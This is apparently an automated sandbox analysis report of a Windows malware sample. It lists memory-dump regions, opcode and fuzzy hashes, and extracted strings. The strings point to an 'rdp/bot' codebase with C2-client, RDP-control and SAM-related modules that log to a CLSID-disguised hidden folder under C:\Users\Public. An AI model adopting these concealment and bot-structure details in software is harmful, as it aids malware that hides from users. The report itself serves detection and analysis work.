                    • Instruction Fuzzy Hash: E6217A22A08A8696F6219F19F8807AA77A5BB447D4F444032EF4C47766DF3DD986F700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                    • API String ID: 1004003707-2568489879
                    • Opcode ID: 6b049bc3d6c029a052e072fb1fc95993046fbce77934b4af55192470ce624f2e
                    • Instruction ID: 556cf51f723767135a0144a592fd5934884a3d408bb6a427666a1e1da5c66b31
                    • Opcode Fuzzy Hash: 6b049bc3d6c029a052e072fb1fc95993046fbce77934b4af55192470ce624f2e
                    • Instruction Fuzzy Hash: 574159A1A0CA47A5FA699BD9AC833F46360AF483CCF446432DB5C06196DF7DEA59D300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                    • API String ID: 1004003707-2568489879
                    • Opcode ID: 1a184603a095c2785f17211911e662ef83ed393e3036cf695f0e3083be6901ce
                    • Instruction ID: 13747ca68a08390c090055bb459cc5ac39e020335aa1f91ad11b34e765d592de
                    • Opcode Fuzzy Hash: 1a184603a095c2785f17211911e662ef83ed393e3036cf695f0e3083be6901ce
                    • Instruction Fuzzy Hash: 9041EB61E0CA47D5FA609BDDAD803B52364BB063C8F8445B2DF4E465A5DF3CAB59C300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-3977765790
                    • Opcode ID: a5c6423a5378826f41d1e00e337d869f499e52ea9b23018924f27b0ddc25a9b7
                    • Instruction ID: 878e7b82a69d4d0e5f7cb492d43da888e2cb05970bbd5d840b266d956bcf38aa
                    • Opcode Fuzzy Hash: a5c6423a5378826f41d1e00e337d869f499e52ea9b23018924f27b0ddc25a9b7
                    • Instruction Fuzzy Hash: F44141A1A0CA47A5FA19ABDCEC427B46391AF483CCF446036DB0D06196DF7CE55AD310
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-3977765790
                    • Opcode ID: 3d6d22d10641deace307fba5547bc6261cfc25d0abbb71d060340f09f2567f54
                    • Instruction ID: f2acb7726a1c969784fc4d013b0b3a17edee90f3b3d15fd767fa98817a89d0f3
                    • Opcode Fuzzy Hash: 3d6d22d10641deace307fba5547bc6261cfc25d0abbb71d060340f09f2567f54
                    • Instruction Fuzzy Hash: 3741E861A0CA47E6FA208BD9AC817F52754BB123C8F4445B6DF4D469A5EF3CEB4AC300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                    • API String ID: 1004003707-3977765790
                    • Opcode ID: bbd8d863d0c2393a798718cc76c9459790273a858cadf82e92e436848f4ab38c
                    • Instruction ID: 7b27ca96c6272c38e14ce30cf6208caefe170f999f47ff984c3b7d6dc462309e
                    • Opcode Fuzzy Hash: bbd8d863d0c2393a798718cc76c9459790273a858cadf82e92e436848f4ab38c
                    • Instruction Fuzzy Hash: 8A411A62A185C7A5FA209F5CE8807F463A1AB003C8F598532DB6D465D7EF3CA946F300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: .applied$????-pat$pkg$tch.pkg$update.p
                    • API String ID: 39653677-1686225151
                    • Opcode ID: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
                    • Instruction ID: 9a64d2e2800da9be375d7bf2ebe10c18edf8bcd5c8e6497d5028bd97cd5caaaa
                    • Opcode Fuzzy Hash: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
                    • Instruction Fuzzy Hash: AF21DF12A2CF4345EB24FA259C0CB79D6A14F55B89F884070DA4E4B3D2DF2CE8A0836C
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                    • API String ID: 513531256-2729875187
                    • Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                    • Instruction ID: 192698b790a3d7501eb2b4f62925a19198bc1222833894718abd5b71bfc7802f
                    • Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                    • Instruction Fuzzy Hash: 64418F72A0C641A6F7209BDDE8643BAB761BB887C4F484031DB4D83795DF3CE5898740
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
                    • API String ID: 513531256-3034662401
                    • Opcode ID: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                    • Instruction ID: 35fe09fd5ab75f8f0947a13e1b2c85f5956fca94ccb25f00d5fd60c10542b033
                    • Opcode Fuzzy Hash: 48f2d0586bcf9582210c7769f526a14f8a933ced909767e9bd83258acf42f857
                    • Instruction Fuzzy Hash: E0416F21A0D68286F3219B99E8553FA73A1FB897C0F448035DB4D97B96CF3CE985C740
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                    • API String ID: 513531256-2115573132
                    • Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                    • Instruction ID: e53a5fb9558cbbbc1d3acd7d4ae9cdab037c85f043cb7140463db60464642fe5
                    • Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                    • Instruction Fuzzy Hash: 03417E75E0D6C286F322AF19E8643B96361AB897C0F444031DB4D87B95CF7CE586E740
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
                    • API String ID: 513531256-1680544107
                    • Opcode ID: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                    • Instruction ID: 5dbfc850651ab64853deb5ed9a89276e18f70564916043b9ca9f0c6ba60b0c8a
                    • Opcode Fuzzy Hash: ef29e44cde9033f20ab4b5173c77ea9af5470e879b81eafeed9fc3cb8f1e3a96
                    • Instruction Fuzzy Hash: E541B331A0CA859AF3289B98EC963BAA354FB857C8F442031DB4D47792CF3DE5898740
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                    • API String ID: 513531256-2601447032
                    • Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                    • Instruction ID: e4a6ee1a23003230ed0d0669cea95054b0dd28d5e343d22f2643540756e14ce5
                    • Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                    • Instruction Fuzzy Hash: 00414D71A4C68186F720DB9AEC543BA6361BB8A7C4F4400B6DF4D877A5CF2DEB858700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
                    • API String ID: 513531256-1022500615
                    • Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                    • Instruction ID: 15cc3d0b5a60226fdfc4e58b4d97cdd2c4676b62474891348f41eafe1da1afa4
                    • Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                    • Instruction Fuzzy Hash: F4418B62A0C6C186F3209F19E8503F963A4FB9A7D0F854130DB0D57B96DF3DE986A704
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                    • API String ID: 2918714741-1951032453
                    • Opcode ID: a5ca9b0bf9b3be9852da4ba323c51029fd9cf6fcbeba48dbf9b72e0c84d279d6
                    • Instruction ID: e21125e88ac6f15d7a7162140a449020367fbe9ab2483713d00ba015a0b2b830
                    • Opcode Fuzzy Hash: a5ca9b0bf9b3be9852da4ba323c51029fd9cf6fcbeba48dbf9b72e0c84d279d6
                    • Instruction Fuzzy Hash: 26219266A0964792E7119F99E840BAA7760BB847D4F448032EF4C47BA6DF3CE845C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                    • API String ID: 2918714741-719680006
                    • Opcode ID: a242bb18889e0c0625166b0c1d0e8931bd7771407aa4d943679f1e3ef64d3bc1
                    • Instruction ID: 81e7acbe6276570ffdadcceb78e253ecb891e58cf5bb9b1173ad15bdb73e6d96
                    • Opcode Fuzzy Hash: a242bb18889e0c0625166b0c1d0e8931bd7771407aa4d943679f1e3ef64d3bc1
                    • Instruction Fuzzy Hash: 4B2192A2A0968696E7519FADFC407AA3360FB847D4F848032EF4C47A95DF3DE885C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: CopyErrorFileLastfflushfwrite
                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                    • API String ID: 2887799713-3464183404
                    • Opcode ID: e0801e7690222cc35289c1b93414f4e860f672ed9cdf723d85d364122bdd9ec2
                    • Instruction ID: 15a5b440f223f9f7a0f8f5d4e1c0e1a062501792a50cea36b0253be610a86884
                    • Opcode Fuzzy Hash: e0801e7690222cc35289c1b93414f4e860f672ed9cdf723d85d364122bdd9ec2
                    • Instruction Fuzzy Hash: 97419291E7C61781FA20FA459C00B79E6607F00B89FD44432D90E467E0EF6DE6E1E32A
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                    • API String ID: 2018770650-4119452840
                    • Opcode ID: 09e8feae0f86e5f08bdf1165c431ff31ac24ab6767de1c26253ba0b688ab206d
                    • Instruction ID: fb5ac61f12049688786605316fcfaecca83584819268776ab4e98f00e6e456a7
                    • Opcode Fuzzy Hash: 09e8feae0f86e5f08bdf1165c431ff31ac24ab6767de1c26253ba0b688ab206d
                    • Instruction Fuzzy Hash: 23312C51F2C206C2FA60FB08AC54FB9E1609F50794FA44832CA1F472D1AF1CE8E5932A
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                    • API String ID: 1802528911-690514478
                    • Opcode ID: e8ba87babdc92bbe2a7f32843d88da73179fa1b60c34bd879e4ec4185fda7202
                    • Instruction ID: d54c172bcc8366aaa6b0cd1f63937d0d8bcf20c985ed33fb8fe988ef89450408
                    • Opcode Fuzzy Hash: e8ba87babdc92bbe2a7f32843d88da73179fa1b60c34bd879e4ec4185fda7202
                    • Instruction Fuzzy Hash: 9F21AE61B1854381EA206FEDB980AF86781AF967F4F549331DF3C87AE6DE2DA545C300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                    • API String ID: 1802528911-690514478
                    • Opcode ID: 393cc4d55ed95309d327a289b224e54295f4c57547dcd5b235bd5891c8381aac
                    • Instruction ID: 128cff68bfc942b3a57d822e3cbb91adaf8104362f16a1dd2e628078fdaa8a9b
                    • Opcode Fuzzy Hash: 393cc4d55ed95309d327a289b224e54295f4c57547dcd5b235bd5891c8381aac
                    • Instruction Fuzzy Hash: 1221D151B0891245FA284FADAD426B45B51AF057FCF546331DFBC9A6E2DE2CA8498300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                    • Instruction ID: 7cf72b812e1feb1f079a4c886e2a667ce9ff092629a9dbf0a4f1cfb7c8caca71
                    • Opcode Fuzzy Hash: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                    • Instruction Fuzzy Hash: 35118271A0958296F720AB9DE84006AB760FF987D4F504235EB6D83FE4DF7CE5498B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                    • Instruction ID: 7631d90fcac33f23cd3ebdb359f02effd0c428c7ab7b2395ecefb8411b1ac45d
                    • Opcode Fuzzy Hash: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                    • Instruction Fuzzy Hash: 6A113071A1854286E724AFADF8045B5A760FF887D4F108235EB6D837A5DF7CD509CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: e3bf17d15134ec2d5b8b500cbb7a150eea8208203bd0f4f35b313d41db0cba31
                    • Instruction ID: 0722d53ca4698f41bb1f32d85a576daa88be57ee0f9b98ea681112667b733d14
                    • Opcode Fuzzy Hash: e3bf17d15134ec2d5b8b500cbb7a150eea8208203bd0f4f35b313d41db0cba31
                    • Instruction Fuzzy Hash: FF116071A086C386F7609F1DA840076AA61EF897D4F604232EB6E937E4DF7CE549DB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: 6327c41a263b5bd59de28098a4b2cc79f4f79abb1213812bc069fc7c46f51ebf
                    • Instruction ID: c73c510c01fa6896908e309f05f6a81dec94294a1b9b3e63e7b39f8b9cb4b151
                    • Opcode Fuzzy Hash: 6327c41a263b5bd59de28098a4b2cc79f4f79abb1213812bc069fc7c46f51ebf
                    • Instruction Fuzzy Hash: 0911E670A085424AF3649BAEE8011696760FF887C8F106235EB6D83BE5EF7CD54D8B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: f40d194872c8d45ecef68134c9250b96dff7f7ea37d8a0e4c201a4cf96a80767
                    • Instruction ID: 882c4a1239bd293b3a3b0140c111a1b068546f167f57a38e305101af8da6518e
                    • Opcode Fuzzy Hash: f40d194872c8d45ecef68134c9250b96dff7f7ea37d8a0e4c201a4cf96a80767
                    • Instruction Fuzzy Hash: 2711547160C54296E361AB9DAC4047A6660FB9A7D4F504272EF5E837B4DF7CD60E8B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: 210327e81317c6c81d8a4d3a67e3bb1bf57ab15882df713e7d46baaea4ccbee5
                    • Instruction ID: d599f8b02d15c097c4edb2ea157ec6280bd39072c889911d061f5213395272f2
                    • Opcode Fuzzy Hash: 210327e81317c6c81d8a4d3a67e3bb1bf57ab15882df713e7d46baaea4ccbee5
                    • Instruction Fuzzy Hash: 8E116371A0858296E3209F2DE840565A660AF987D4F104335EB6D83AE5DF7CD507AB01
                    APIs
                    Strings
                    • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FF8BFAB631F
                    • routine_tx, xrefs: 00007FF8BFAB6318
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
